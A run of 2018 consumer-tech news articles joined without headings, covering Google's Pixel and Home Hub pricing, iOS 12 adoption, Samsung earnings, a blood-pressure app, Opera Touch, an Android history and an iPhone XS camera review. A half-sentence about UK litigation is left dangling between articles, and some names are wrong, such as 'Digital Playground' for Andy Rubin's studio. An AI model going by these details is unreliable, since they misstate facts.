With its latest consumer hardware products, Google’s prices are undercutting Apple, Samsung and Amazon. The search giant just unveiled its latest flagship smartphone, tablet and smart home device, all available at prices well below their direct competitors. Where Apple and Samsung are pushing prices of its latest products even higher, Google is seemingly happy to keep prices low, and this is creating a distinct advantage for the company’s products.
Google, like Amazon and nearly Apple, is a services company that happens to sell hardware. It needs to acquire users through multiple verticals, including hardware. Somewhere, deep in the Googleplex, a team of number-crunchers decided it made more sense to make its hardware prices dramatically lower than competitors. If Google is taking a loss on the hardware, it is likely making it back through services.
Amazon does this with Kindle devices. Microsoft and Sony do it with game consoles. This is a proven strategy to increase market share where the revenue generated on the back end recovers the revenue lost on selling hardware with slim or negative margins.
Look at the Pixel 3. The base 64GB model is available for $799, while the base 64GB iPhone XS is $999. Want a bigger screen? The 64GB Pixel 3 XL is $899, and the 64GB iPhone XS Max is $1,099. Regarding the specs, both phones offer OLED displays and amazing cameras. There are likely pros and cons regarding the speed of the SoC, amount of RAM and wireless capabilities. Will consumers care that the screen and camera are so similar? Probably not.
Google also announced the Home Hub today. Like the Echo Show, it’s designed to be the central part of a smart home. It puts Google Assistant on a fixed screen where users can ask it questions and control a smart home. It’s $149. That’s $80 less than the Echo Show, though the Google version lacks video conferencing and a dedicated smart home hub — the Google Home Hub requires extra hardware for some smart home objects. Still, even with fewer features, the Home Hub is compelling because of its drastically lower price. For just a few dollars more than an Echo Show, a buyer could get a Home Hub and two Home Minis.
The Google Pixel Slate is Google’s answer to the iPad Pro. From everything we’ve seen, it appears to lack a lot of the processing power found in Apple’s top tablet. It doesn’t seem as refined or capable of specific tasks. But for view media, creating content and playing games, it feels just fine. It even has a Pixelbook Pen and a great keyboard that shows Google is positioning this against the iPad Pro. And the 12.3-inch Pixel Slate is available for $599, where the 12.9-inch iPad Pro is $799.
The upfront price is just part of the equation. When considering the resale value of these devices, a different conclusion can be reached. Apple products consistently resale for more money than Google products. On Gazelle.com, a company that buys used smartphones, a used iPhone X is worth $425, whereas a used Pixel 2 is $195. A used iPhone 8, a phone that sold for a price closer to the Pixel 2, is worth $240.
In the end, Google likely doesn’t expect to make money off the hardware it sells. It needs users to buy into its services. The best way to do that is to make the ecosystem competitive though perhaps not investing the capital to make it the best. It needs to be just good enough, and that’s how I would describe these devices. Good enough to be competitive on a spec-to-spec basis while available for much less.
An attempt to bring a class-action style litigation in the UK to claim up to
Analytics company Mixpanel is currently tracking the install base of iOS 12. And the latest version of iOS is quite popular, as it’s already installed on roughly 47.6 percent of all iOS devices; 45.6 percent of devices still run iOS 11, and 6.9 percent of iOS users run an older version.
Adoption rate is an important metric for app developers. With major iOS releases, Apple also releases new frameworks. But developers still need to support old versions of iOS for a little bit before moving entirely to newer frameworks and dropping support for old iOS versions.
But it’s interesting to see that you can already drop support for iOS 10 without losing too many customers. Chances are that users who don’t update their version of iOS don’t really care about having the latest version of your app anyway.
With iOS 11, it took much longer to reach that level. Last year, Apple announced on November 6th that iOS 11 was more popular than iOS 10. Sure, Mixpanel and Apple don’t have the exact same numbers, but you can already see that the trend is different this year.
iOS 12 focuses on performance. Apple has optimized this major release for older devices, such as the iPhone 6. All devices that run iOS 11 can update to iOS 12 as well. Basically, if you want a faster phone, you should update to iOS 12.
This is a bit counterintuitive, as previous iOS releases had rendered older devices much slower. But based on the adoption rate, it sounds like iOS users got the message.
Samsung’s last quarter of business saw its slowest growth of profits in a year thanks to weak sales of its flagship Galaxy S9 smartphone. But the company is about much more than just phones, and that’s why it is forecasting a record operating profit of nearly $15.5 billion for its upcoming Q3 results.
The Korean firm said in a filing that it expects revenue to jump five percent year-on-year, to hit 65 trillion KRW ($57.5 billion) with an operating profit of 17.5 trillion KRW ($15.5 billion), which represents a 20 percent annual jump and an 18 percent increase on the previous quarter.
Samsung’s pre-earnings filings are brief and don’t contain detailed information about the performance of its business units, thus we can’t assess demand for its high-end phones — which include the Note 9 — in the quarter that Apple unveiled its newest iPhones. But the clues suggest that it is actually the more boring (but reliable) divisions that are, once again, responsible for Samsung’s strong forecast.
Chips account for some 80 percent of Samsung’s revenue, and demand for DRAM, which is important in areas such as cloud, pushed prices up during Q3 but analysts suspect that the growth won’t last.
“Its earnings appeared to have peaked,” Mirae Asset Daewoo Securities analyst William Park told Reuters. “DRAM prices are going to fall, although not dramatically, and that will negatively impact its margins.”
We’ll know more when Samsung releases its full earnings this month.
If a twinkle in the eye of a venture capitalist could predict the longevity of a startup, Vital Labs is going all the way.
During a quick demo of the Burlingame, Calif.-based startup’s app, called Vitality, True Ventures partner Adam D’Augelli’s enthusiasm was potent. The company, which emerges from stealth today, is pioneering a new era of personalized cardiovascular healthcare, he said.
Vitality can read changes in a person’s blood pressure using an iPhone’s camera and graphics processing power. The goal is to replace blood pressure cuffs to become the most accurate method of measuring changes in blood pressure and eventually other changes in the cardiovascular system.
The app is still in beta testing and is expected to complete an official commercial rollout in 2019.
The technology relies on a technique called photoplethysmography. By turning on the light from a phone’s flash and placing a person’s index finger over the camera on the back of the phone, the light illuminates the blood vessels in the fingertip and the camera captures changes in intensity as blood flows through the vessels with each heartbeat.
This technique results in a time-varying signal called the blood-pulse waveform (BPW). The app captures a 1080p video at 120 frames per second and processes that data in real time using the iPhone’s graphics processing unit to provide a high-resolution version of a person’s BPW.
The startup was founded by Tuhin Sinha, Ph.D., the former technical director for UCSF’s Health eHeart Study. He’s been working on the app for several years.
“Part of the reason this project strikes a chord with me is because if I look at the stats of my own family, I probably only have 20 years left,” Sinha told TechCrunch. “Most people on my dad’s side of the family have passed away before 60 from cardiovascular disease.”
Prior to joining UCSF, Sinha was an instructor at Vanderbilt University and the director of the Center for Image Analysis, where he directed and developed medical image analysis algorithms.
He linked up with True Ventures in June 2015, raising a total of $1 million from the early-stage venture capital firm.
“[Sinha] saw an opportunity to improve a stagnant practice and invented a new approach that takes full advantage of today’s technologies,” True’s D’Augelli said in a statement.
Three years after that initial funding, Sinha says Vital Labs is looking to raise another round of capital with plans to create additional digital tools to advance cardiovascular health.
Browser company Opera is back doing what it does best, offering you beautifully designed alternatives to the stock browsers from the likes of Google and Apple . This week the company brought its ‘Opera Touch’ browser to iOS to give iPhone owners a different option to the basic Safari browser.
The app was first launched for Android in April and, as we noted at the time, it reinvents a lot of the established paradigms to work well on mobile and particularly large screens that don’t have a home button — which is steadily becoming every premium devices on the market today.
Touch for iOS — which you can download here — will be particularly of interest to owners of the iPhone X or Apple’s newest iPhone XS, iPhone XS Max and (upcoming) iPhone XR devices since it is optimized for one-handed use. That’s to say it employs the same nifty user interface seen on the Android app (see below), which lets you open or close tabs, switch to search, go back or forward using a menu bar located at the bottom of the screen. One thing it is missing, for now, is more comprehensive management of bookmarks.
The app also includes Opera’s ‘Flow’ technology which lets a user pass links, images and notes from their phone to an Opera browser on their computer using a “secure and private” connection.
As ever, the Opera browser comes with ad blocking built-in and there’s the company’s usual protection from cryptojacking — that’s the process of being hacked and having your CPU used to mine crypto for someone else.
All in all, the browser is worth taking for a spin if you have Apple’s new home buttonless devices and seek an alternative to the pre-loaded Safari browser. Other options might include Google Chrome, recently given a redesign for its tenth anniversary, as well as Mozilla, UC Web, Dolphin and Brave.
The new iPhones have excellent cameras, to be sure. But it’s always good to verify Apple’s breathless onstage claims with first-hand reports. We have our own review of the phones and their photography systems, but teardowns provide the invaluable service of letting you see the biggest changes with your own eyes — augmented, of course, by a high-powered microscope.
Although the optics of the new camera are as far as we can tell unchanged since the X, the sensor is a new one and is worth looking closely at.
Microphotography of the sensor die show that Apple’s claims are borne out and then some. The sensor size has increased from 32.8mm2 to 40.6mm2 — a huge difference despite the small units. Every tiny bit counts at this scale. (For comparison, the Galaxy S9 is 45mm2, and the soon-to-be-replaced Pixel 2 is 25mm2.)
The pixels themselves also, as advertised, grew from 1.22 microns (micrometers) across to 1.4 microns — which should help with image quality across the board. But there’s an interesting, subtler development that has continually but quietly changed ever since its introduction: the “focus pixels.”
That’s Apple’s brand name for phase detection autofocus (PDAF) points, found in plenty of other devices. The basic idea is that you mask off half a sub-pixel every once in a while (which I guess makes it a sub-sub-pixel), and by observing how light enters these half-covered detectors you can tell whether something is in focus or not.
Of course, you need a bunch of them to sense the image patterns with high fidelity, but you have to strike a balance: losing half a pixel may not sound like much, but if you do it a million times, that’s half a megapixel effectively down the drain. Wondering why all the PDAF points are green? Many camera sensors use an “RGBG” sub-pixel pattern, meaning there are two green sub-pixels for each red and blue one — it’s complicated why. But there are twice as many green sub-pixels and therefore the green channel is more robust to losing a bit of information.Apple introduced PDAF in the iPhone 6, but as you can see in TechInsights’ great diagram, the points are pretty scarce. There’s one for maybe every 64 sub-pixels, and not only that, they’re all masked off in the same orientation: either the left or right half gone.
The 6S and 7 Pluses saw the number double to one PDAF point per 32 sub-pixels. And in the 8 Plus, the number is improved to one per 20 — but there’s another addition: now the phase detection masks are on the tops and bottoms of the sub-pixels as well. As you can imagine, doing phase detection in multiple directions is a more sophisticated proposal, but it could also significantly improve the accuracy of the process. Autofocus systems all have their weaknesses, and this may have addressed one Apple regretted in earlier iterations.
Which brings us to the XS (and Max, of course), in which the PDAF points are now one per 16 sub-pixels, having increased the frequency of the vertical phase detection points so that they’re equal in number to the horizontal one. Clearly the experiment paid off and any consequent light loss has been mitigated or accounted for.
I’m curious how the sub-pixel patterns of Samsung, Huawei and Google phones compare, and I’m looking into it. But I wanted to highlight this interesting little evolution. It’s an interesting example of the kind of changes that are hard to understand when explained in simple number form — we’ve doubled this, or there are a million more of that — but which make sense when you see them in physical form.
According to some early numbers from Apple analyst extraordinaire Ming-Chi Kuo, the iPhone Max XS is currently running laps around its smaller counterpart. In a note posted by MacRumors, Kuo suggested that the 6.5-inch handset sold three to four times as well as the XS during its inaugural weekend.
“We have determined that the demand for XS Max is better than expected (3-4 times that of XS),” says Kuo. “The gold and space-grey colors are significantly more popular than the silver. 256GB is the most popular, and 512GB is subject to a serious shortage because only Samsung can currently ship NAND Flash well. We are positive that XS Max shipments will grow steadily in 4Q18 thanks to demand from Asia market and the gift season.”
The higher demand shouldn’t be altogether surprising. After all, the XS doesn’t mark an earth-shattering upgrade over its predecessor. The Max, on the other hand, is a pretty sizable jump in display size for the company that once suggested consumers simple don’t want a larger phone.
And while the two models are quite similar from the standpoint of specs, the bigger display will only run an extra $100. If you’re already in for $1,000, what’s another $100 between friends, right?
The note also states that Apple Watch Series 4 demand is better than anticipated, while the iPhone XR is expected to be a good seller for the company. No surprise on that last one, really. The XR represents an attainable upgrade for those users unwilling or unable to pull the trigger for a $1,000 phone with last year’s handset.
It’s been 10 years since Google took the wraps off the G1, the first Android phone. Since that time the OS has grown from buggy, nerdy iPhone alternative to arguably the most popular (or at least populous) computing platform in the world. But it sure as heck didn’t get there without hitting a few bumps along the road.
Join us for a brief retrospective on the last decade of Android devices: the good, the bad, and the Nexus Q.
This is the one that started it all, and I have a soft spot in my heart for the old thing. Also known as the HTC Dream — this was back when we had an HTC, you see — the G1 was about as inauspicious a debut as you can imagine. Its full keyboard, trackball, slightly janky slide-up screen (crooked even in official photos), and considerable girth marked it from the outset as a phone only a real geek could love. Compared to the iPhone, it was like a poorly dressed whale.
But in time its half-baked software matured and its idiosyncrasies became apparent for the smart touches they were. To this day I occasionally long for a trackball or full keyboard, and while the G1 wasn’t pretty, it was tough as hell.
Of course, most people didn’t give Android a second look until Moto came out with the Droid, a slicker, thinner device from the maker of the famed RAZR. In retrospect, the Droid wasn’t that much better or different than the G1, but it was thinner, had a better screen, and had the benefit of an enormous marketing push from Motorola and Verizon. (Disclosure: Verizon owns Oath, which owns TechCrunch, but this doesn’t affect our coverage in any way.)
For many, the Droid and its immediate descendants were the first Android phones they had — something new and interesting that blew the likes of Palm out of the water, but also happened to be a lot cheaper than an iPhone.
This was the fruit of the continued collaboration between Google and HTC, and the first phone Google branded and sold itself. The Nexus One was meant to be the slick, high-quality device that would finally compete toe-to-toe with the iPhone. It ditched the keyboard, got a cool new OLED screen, and had a lovely smooth design. Unfortunately it ran into two problems.
First, the Android ecosystem was beginning to get crowded. People had lots of choices and could pick up phones for cheap that would do the basics. Why lay the cash out for a fancy new one? And second, Apple would shortly release the iPhone 4, which — and I was an Android fanboy at the time — objectively blew the Nexus One and everything else out of the water. Apple had brought a gun to a knife fight.
Another HTC? Well, this was prime time for the now-defunct company. They were taking risks no one else would, and the Evo 4G was no exception. It was, for the time, huge: the iPhone had a 3.5-inch screen, and most Android devices weren’t much bigger, if they weren’t smaller.
The Evo 4G somehow survived our criticism (our alarm now seems extremely quaint, given the size of the average phone now) and was a reasonably popular phone, but ultimately is notable not for breaking sales records but breaking the seal on the idea that a phone could be big and still make sense. (Honorable mention goes to the Droid X.)
Samsung’s big debut made a hell of a splash, with custom versions of the phone appearing in the stores of practically every carrier, each with their own name and design: the AT&T Captivate, T-Mobile Vibrant, Verizon Fascinate, and Sprint Epic 4G. As if the Android lineup wasn’t confusing enough already at the time!
Though the S was a solid phone, it wasn’t without its flaws, and the iPhone 4 made for very tough competition. But strong sales reinforced Samsung’s commitment to the platform, and the Galaxy series is still going strong today.
This was an era in which Android devices were responding to Apple, and not vice versa as we find today. So it’s no surprise that hot on the heels of the original iPad we found Google pushing a tablet-focused version of Android with its partner Motorola, which volunteered to be the guinea pig with its short-lived Xoom tablet.
Although there are still Android tablets on sale today, the Xoom represented a dead end in development — an attempt to carve a piece out of a market Apple had essentially invented and soon dominated. Android tablets from Motorola, HTC, Samsung and others were rarely anything more than adequate, though they sold well enough for a while. This illustrated the impossibility of “leading from behind” and prompted device makers to specialize rather than participate in a commodity hardware melee.
And who better to illustrate than Amazon? Its contribution to the Android world was the Fire series of tablets, which differentiated themselves from the rest by being extremely cheap and directly focused on consuming digital media. Just $200 at launch and far less later, the Fire devices catered to the regular Amazon customer whose kids were pestering them about getting a tablet on which to play Fruit Ninja or Angry Birds, but who didn’t want to shell out for an iPad.
Turns out this was a wise strategy, and of course one Amazon was uniquely positioned to do with its huge presence in online retail and the ability to subsidize the price out of the reach of competition. Fire tablets were never particularly good, but they were good enough, and for the price you paid, that was kind of a miracle.
Sony has always had a hard time with Android. Its Xperia line of phones for years were considered competent — I owned a few myself — and arguably industry-leading in the camera department. But no one bought them. And the one they bought the least of, or at least proportional to the hype it got, has to be the Xperia Play. This thing was supposed to be a mobile gaming platform, and the idea of a slide-out keyboard is great — but the whole thing basically cratered.
What Sony had illustrated was that you couldn’t just piggyback on the popularity and diversity of Android and launch whatever the hell you wanted. Phones didn’t sell themselves, and although the idea of playing Playstation games on your phone might have sounded cool to a few nerds, it was never going to be enough to make it a million-seller. And increasingly that’s what phones needed to be.
As a sort of natural climax to the swelling phone trend, Samsung went all out with the first true “phablet,” and despite groans of protest the phone not only sold well but became a staple of the Galaxy series. In fact, it wouldn’t be long before Apple would follow on and produce a Plus-sized phone of its own.
The Note also represented a step towards using a phone for serious productivity, not just everyday smartphone stuff. It wasn’t entirely successful — Android just wasn’t ready to be highly productive — but in retrospect it was forward thinking of Samsung to make a go at it and begin to establish productivity as a core competence of the Galaxy series.
This abortive effort by Google to spread Android out into a platform was part of a number of ill-considered choices at the time. No one really knew, apparently at Google or anywhere elsewhere in the world, what this thing was supposed to do. I still don’t. As we wrote at the time:
Here’s the problem with the Nexus Q: it’s a stunningly beautiful piece of hardware that’s being let down by the software that’s supposed to control it.
It was made, or rather nearly made in the USA, though, so it had that going for it.
The First got dealt a bad hand. The phone itself was a lovely piece of hardware with an understated design and bold colors that stuck out. But its default launcher, the doomed Facebook Home, was hopelessly bad.
How bad? Announced in April, discontinued in May. I remember visiting an AT&T store during that brief period and even then the staff had been instructed in how to disable Facebook’s launcher and reveal the perfectly good phone beneath. The good news was that there were so few of these phones sold new that the entire stock started selling for peanuts on Ebay and the like. I bought two and used them for my early experiments in ROMs. No regrets.
This was the beginning of the end for HTC, but their last few years saw them update their design language to something that actually rivaled Apple. The One and its successors were good phones, though HTC oversold the “Ultrapixel” camera, which turned out to not be that good, let alone iPhone-beating.
As Samsung increasingly dominated, Sony plugged away, and LG and Chinese companies increasingly entered the fray, HTC was under assault and even a solid phone series like the One couldn’t compete. 2014 was a transition period with old manufacturers dying out and the dominant ones taking over, eventually leading to the market we have today.
Google/LG Nexus 5X and Huawei 6P (2015)
This was the line that brought Google into the hardware race in earnest. After the bungled Nexus Q launch, Google needed to come out swinging, and they did that by marrying their more pedestrian hardware with some software that truly zinged. Android 5 was a dream to use, Marshmallow had features that we loved … and the phones became objects that we adored.
We called the 6P “the crown jewel of Android devices”. This was when Google took its phones to the next level and never looked back.
Google Pixel (2016)
If the Nexus was, in earnest, the starting gun for Google’s entry into the hardware race, the Pixel line could be its victory lap. It’s an honest-to-god competitor to the Apple phone.
Gone are the days when Google is playing catch-up on features to Apple, instead, Google’s a contender in its own right. The phone’s camera is amazing. The software works relatively seamlessly (bring back guest mode!), and phone’s size and power are everything anyone could ask for. The sticker price, like Apple’s newest iPhones, is still a bit of a shock, but this phone is the teleological endpoint in the Android quest to rival its famous, fruitful, contender.
In 2017 Andy Rubin, the creator of Android, debuted the first fruits of his new hardware startup studio, Digital Playground, with the launch of Essential (and its first phone). The company had raised $300 million to bring the phone to market, and — as the first hardware device to come to market from Android’s creator — it was being heralded as the next new thing in hardware.
Here at TechCrunch, the phone received mixed reviews. Some on staff hailed the phone as the achievement of Essential’s stated vision — to create a “lovemark” for Android smartphones, while others on staff found the device… inessential.
Ultimately, the market seemed to agree. Four months ago plans for a second Essential phone were put on hold, while the company explored a sale and pursued other projects. There’s been little update since.
In the ten years since its launch, Android has become the most widely used operating system for hardware. Some version of its software can be found in roughly 2.3 billion devices around the world and its powering a technology revolution in countries like India and China — where mobile operating systems and access are the default. As it enters its second decade, there’s no sign that anything is going to slow its growth (or dominance) as the operating system for much of the world.
Let’s see what the next ten years bring.
The iPhone XS proves one thing definitively: that the iPhone X was probably one of the most ambitious product bets of all time.
When Apple told me in 2017 that they put aside plans for the iterative upgrade that they were going to ship and went all in on the iPhone X because they thought they could jump ahead a year, they were not blustering. That the iPhone XS feels, at least on the surface, like one of Apple’s most “S” models ever is a testament to how aggressive the iPhone X timeline was.
I think there will be plenty of people who will see this as a weakness of the iPhone XS, and I can understand their point of view. There are about a half-dozen definitive improvements in the XS over the iPhone X, but none of them has quite the buzzword-worthy effectiveness of a marquee upgrade like 64-bit, 3D Touch or wireless charging — all benefits delivered in previous “S” years.
That weakness, however, is only really present if you view it through the eyes of the year-over-year upgrader. As an upgrade over an iPhone X, I’d say you’re going to have to love what they’ve done with the camera to want to make the jump. As a move from any other device, it’s a huge win and you’re going head-first into sculpted OLED screens, face recognition and super durable gesture-first interfaces and a bunch of other genre-defining moves that Apple made in 2017, thinking about 2030, while you were sitting back there in 2016.
Since I do not have an iPhone XR, I can’t really make a call for you on that comparison, but from what I saw at the event and from what I know about the tech in the iPhone XS and XS Max from using them over the past week, I have some basic theories about how it will stack up.
For those with interest in the edge of the envelope, however, there is a lot to absorb in these two new phones, separated only by size. Once you begin to unpack the technological advancements behind each of the upgrades in the XS, you begin to understand the real competitive edge and competence of Apple’s silicon team, and how well they listen to what the software side needs now and in the future.
Whether that makes any difference for you day to day is another question, one that, as I mentioned above, really lands on how much you like the camera.
But first, let’s walk through some other interesting new stuff.
As is always true with my testing methodology, I treat this as anyone would who got a new iPhone and loaded an iCloud backup onto it. Plenty of other sites will do clean room testing if you like comparison porn, but I really don’t think that does most folks much good. By and large most people aren’t making choices between ecosystems based on one spec or another. Instead, I try to take them along on prototypical daily carries, whether to work for TechCrunch, on vacation or doing family stuff. A foot injury precluded any theme parks this year (plus, I don’t like to be predictable) so I did some office work, road travel in the center of California and some family outings to the park and zoo. A mix of uses cases that involves CarPlay, navigation, photos and general use in a suburban environment.
In terms of testing locale, Fresno may not be the most metropolitan city, but it’s got some interesting conditions that set it apart from the cities where most of the iPhones are going to end up being tested. Network conditions are pretty adverse in a lot of places, for one. There’s a lot of farmland and undeveloped acreage and not all of it is covered well by wireless carriers. Then there’s the heat. Most of the year it’s above 90 degrees Fahrenheit and a good chunk of that is spent above 100. That means that batteries take an absolute beating here and often perform worse than other, more temperate, places like San Francisco. I think that’s true of a lot of places where iPhones get used, but not so much the places where they get reviewed.
That said, battery life has been hard to judge. In my rundown tests, the iPhone XS Max clearly went beast mode, outlasting my iPhone X and iPhone XS. Between those two, though, it was tougher to tell. I try to wait until the end of the period I have to test the phones to do battery stuff so that background indexing doesn’t affect the numbers. In my ‘real world’ testing in the 90+ degree heat around here, iPhone XS did best my iPhone X by a few percentage points, which is what Apple does claim, but my X is also a year old. The battery didn’t fail during even intense days of testing with the XS.
In terms of storage I’m tapping at the door of 256GB, so the addition of 512GB option is really nice. As always, the easiest way to determine what size you should buy is to check your existing free space. If you’re using around 50% of what your phone currently has, buy the same size. If you’re using more, consider upgrading because these phones are only getting faster at taking better pictures and video and that will eat up more space.
The review units I was given both had the new gold finish. As I mentioned on the day, this is a much deeper, brassier gold than the Apple Watch Edition. It’s less ‘pawn shop gold’ and more ‘this is very expensive’ gold. I like it a lot, though it is hard to photograph accurately — if you’re skeptical, try to see it in person. It has a touch of pink added in, especially as you look at the back glass along with the metal bands around the edges. The back glass has a pearlescent look now as well, and we were told that this is a new formulation that Apple created specifically with Corning. Apple says that this is the most durable glass ever in a smartphone.
My current iPhone has held up to multiple falls over 3 feet over the past year, one of which resulted in a broken screen and replacement under warranty. Doubtless multiple YouTubers will be hitting this thing with hammers and dropping it from buildings in beautiful Phantom Flex slo-mo soon enough. I didn’t test it. One thing I am interested in seeing develop, however, is how the glass holds up to fine abrasions and scratches over time.
My iPhone X is riddled with scratches both front and back, something having to do with the glass formulation being harder, but more brittle. Less likely to break on impact but more prone to abrasion. I’m a dedicated no-caser, which is why my phone looks like it does, but there’s no way for me to tell how the iPhone XS and XS Max will hold up without giving them more time on the clock. So I’ll return to this in a few weeks.
Both the gold and space grey iPhones XS have been subjected to a coating process called physical vapor deposition or PVD. Basically metal particles get vaporized and bonded to the surface to coat and color the band. PVD is a process, not a material, so I’m not sure what they’re actually coating these with, but one suggestion has been Titanium Nitride. I don’t mind the weathering that has happened on my iPhone X band, but I think it would look a lot worse on the gold, so I’m hoping that this process (which is known to be incredibly durable and used in machine tooling) will improve the durability of the band. That said, I know most people are not no-casers like me so it’s likely a moot point.
Now let’s get to the nut of it: the camera.
I’m (still) not going to be comparing the iPhone XS to an interchangeable lens camera because portrait mode is not a replacement for those, it’s about pulling them out less. That said, this is closest its ever been.
One of the major hurdles that smartphone cameras have had to overcome in their comparisons to cameras with beautiful glass attached is their inherent depth of focus. Without getting too into the weeds (feel free to read this for more), because they’re so small, smartphone cameras produce an incredibly compressed image that makes everything sharp. This doesn’t feel like a portrait or well composed shot from a larger camera because it doesn’t produce background blur. That blur was added a couple of years ago with Apple’s portrait mode and has been duplicated since by every manufacturer that matters — to varying levels of success or failure.
By and large, most manufacturers do it in software. They figure out what the subject probably is, use image recognition to see the eyes/nose/mouth triangle is, build a quick matte and blur everything else. Apple does more by adding the parallax of two lenses OR the IR projector of the TrueDepth array that enables Face ID to gather a multi-layer depth map.
As a note, the iPhone XR works differently, and with fewer tools, to enable portrait mode. Because it only has one lens it uses focus pixels and segmentation masking to ‘fake’ the parallax of two lenses.
With the iPhone XS, Apple is continuing to push ahead with the complexity of its modeling for the portrait mode. The relatively straightforward disc blur of the past is being replaced by a true bokeh effect.
Background blur in an image is related directly to lens compression, subject-to-camera distance and aperture. Bokeh is the character of that blur. It’s more than just ‘how blurry’, it’s the shapes produced from light sources, the way they change throughout the frame from center to edges, how they diffuse color and how they interact with the sharp portions of the image.
Bokeh is to blur what seasoning is to a good meal. Unless you’re the chef, you probably don’t care what they did you just care that it tastes great.
Well, Apple chef-ed it the hell up with this. Unwilling to settle for a templatized bokeh that felt good and leave it that, the camera team went the extra mile and created an algorithmic model that contains virtual ‘characteristics’ of the iPhone XS’s lens. Just as a photographer might pick one lens or another for a particular effect, the camera team built out the bokeh model after testing a multitude of lenses from all of the classic camera systems.
I keep saying model because it’s important to emphasize that this is a living construct. The blur you get will look different from image to image, at different distances and in different lighting conditions, but it will stay true to the nature of the virtual lens. Apple’s bokeh has a medium-sized penumbra, spreading out light sources but not blowing them out. It maintains color nicely, making sure that the quality of light isn’t obscured like it is with so many other portrait applications in other phones that just pick a spot and create a circle of standard gaussian or disc blur.
Check out these two images, for instance. Note that when the light is circular, it retains its shape, as does the rectangular light. It is softened and blurred, as it would when diffusing through the widened aperture of a regular lens. The same goes with other shapes in reflected light scenarios.
Now here’s the same shot from an iPhone X, note the indiscriminate blur of the light. This modeling effort is why I’m glad that the adjustment slider proudly carries f-stop or aperture measurements. This is what this image would look like at a given aperture, rather than a 0-100 scale. It’s very well done and, because it’s modeled, it can be improved over time. My hope is that eventually, developers will be able to plug in their own numbers to “add lenses” to a user’s kit.
And an adjustable depth of focus isn’t just good for blurring, it’s also good for un-blurring. This portrait mode selfie placed my son in the blurry zone because it focused on my face. Sure, I could turn the portrait mode off on an iPhone X and get everything sharp, but now I can choose to “add” him to the in-focus area while still leaving the background blurry. Super cool feature I think is going to get a lot of use.
It’s also great for removing unwanted people or things from the background by cranking up the blur.
And yes, it works on non-humans.
If you end up with an iPhone XS, I’d play with the feature a bunch to get used to what a super wide aperture lens feels like. When its open all the way to f1.4 (not the actual widest aperture of the lens, by the way; this is the virtual model we’re controlling) pretty much only the eyes should be in focus. Ears, shoulders, maybe even nose could be out of the focus area. It takes some getting used to but can produce dramatic results.
Developers do have access to one new feature though, the segmentation mask. This is a more precise mask that aids in edge detailing, improving hair and fine line detail around the edges of a portrait subject. In my testing it has led to better handling of these transition areas and less clumsiness. It’s still not perfect, but it’s better. And third-party apps like Halide are already utilizing it. Halide’s co-creator, Ben Sandofsky, says they’re already seeing improvements in Halide with the segmentation map.
“Segmentation is the ability to classify sets of pixels into different categories,” says Sandofsky. “This is different than a “Hot dog, not a hot dog” problem, which just tells you whether a hot dog exists anywhere in the image. With segmentation, the goal is drawing an outline over just the hot dog. It’s an important topic with self driving cars, because it isn’t enough to tell you there’s a person somewhere in the image. It needs to know that person is directly in front of you. On devices that support it, we use PEM as the authority for what should stay in focus. We still use the classic method on old devices (anything earlier than iPhone 8), but the quality difference is huge.”
The above is an example shot in Halide that shows the image, the depth map and the segmentation map.
My testing of portrait mode on the iPhone XS says that it is massively improved, but that there are still some very evident quirks that will lead to weirdness in some shots like wrong things made blurry and halos of light appearing around subjects. It’s also not quite aggressive enough on foreground objects — those should blur too but only sometimes do. But the quirks are overshadowed by the super cool addition of the adjustable background blur. If conditions are right it blows you away. But every once in a while you still get this sense like the Neural Engine just threw up its hands and shrugged.
Live preview of the depth control in the camera view is not in iOS 12 at the launch of the iPhone XS, but it will be coming in a future version of iOS 12 this fall.
I also shoot a huge amount of photos with the telephoto lens. It’s closer to what you’d consider to be a standard lens on a camera. The normal lens is really wide and once you acclimate to the telephoto you’re left wondering why you have a bunch of pictures of people in the middle of a ton of foreground and sky. If you haven’t already, I’d say try defaulting to 2x for a couple of weeks and see how you like your photos. For those tight conditions or really broad landscapes you can always drop it back to the wide. Because of this, any iPhone that doesn’t have a telephoto is a basic non-starter for me, which is going to be one of the limiters on people moving to iPhone XR from iPhone X, I believe. Even iPhone 8 Plus users who rely on the telephoto I believe will miss it if they don’t go to the XS.
But, man, Smart HDR is where it’s at
I’m going to say something now that is surely going to cause some Apple followers to snort, but it’s true. Here it is:
For a company as prone to hyperbole and Maximum Force Enthusiasm about its products, I think that they have dramatically undersold how much improved photos are from the iPhone X to the iPhone XS. It’s extreme, and it has to do with a technique Apple calls Smart HDR.
Smart HDR on the iPhone XS encompasses a bundle of techniques and technology including highlight recovery, rapid-firing the sensor, an OLED screen with much improved dynamic range and the Neural Engine/image signal processor combo. It’s now running faster sensors and offloading some of the work to the CPU, which enables firing off nearly two images for every one it used to in order to make sure that motion does not create ghosting in HDR images, it’s picking the sharpest image and merging the other frames into it in a smarter way and applying tone mapping that produces more even exposure and color in the roughest of lighting conditions.
Nearly every image you shoot on an iPhone XS or iPhone XS Max will have HDR applied to it. It does it so much that Apple has stopped labeling most images with HDR at all. There’s still a toggle to turn Smart HDR off if you wish, but by default it will trigger any time it feels it’s needed.
And that includes more types of shots that could not benefit from HDR before. Panoramic shots, for instance, as well as burst shots, low light photos and every frame of Live Photos is now processed.
The results for me have been massively improved quick snaps with no thought given to exposure or adjustments due to poor lighting. Your camera roll as a whole will just suddenly start looking like you’re a better picture taker, with no intervention from you. All of this is capped off by the fact that the OLED screens in the iPhone XS and XS Max have a significantly improved ability to display a range of color and brightness. So images will just plain look better on the wider gamut screen, which can display more of the P3 color space.
As far as Face ID goes, there has been no perceivable difference for me in speed or number of positives, but my facial model has been training on my iPhone X for a year. It’s starting fresh on iPhone XS. And I’ve always been lucky that Face ID has just worked for me most of the time. The gist of the improvements here are jumps in acquisition times and confirmation of the map to pattern match. There is also supposed to be improvements in off-angle recognition of your face, say when lying down or when your phone is flat on a desk. I tried a lot of different positions here and could never really definitively say that iPhone XS was better in this regard, though as I said above, it very likely takes training time to get it near the confidence levels that my iPhone X has stored away.
In terms of CPU performance the world’s first at-scale 7nm architecture has paid dividends. You can see from the iPhone XS benchmarks that it compares favorably to fast laptops and easily exceeds iPhone X performance.
The Neural Engine and better A12 chip has meant for better frame rates in intense games and AR, image searches, some small improvement in app launches. One easy way to demonstrate this is the video from the iScape app, captured on an iPhone X and an iPhone XS. You can see how jerky and FPS challenged the iPhone X is in a similar AR scenario. There is so much more overhead for AR experiences I know developers are going to be salivating for what they can do here.
The stereo sound is impressive, surpassingly decent separation for a phone and definitely louder. The tradeoff is that you get asymmetrical speaker grills so if that kind of thing annoys you you’re welcome.
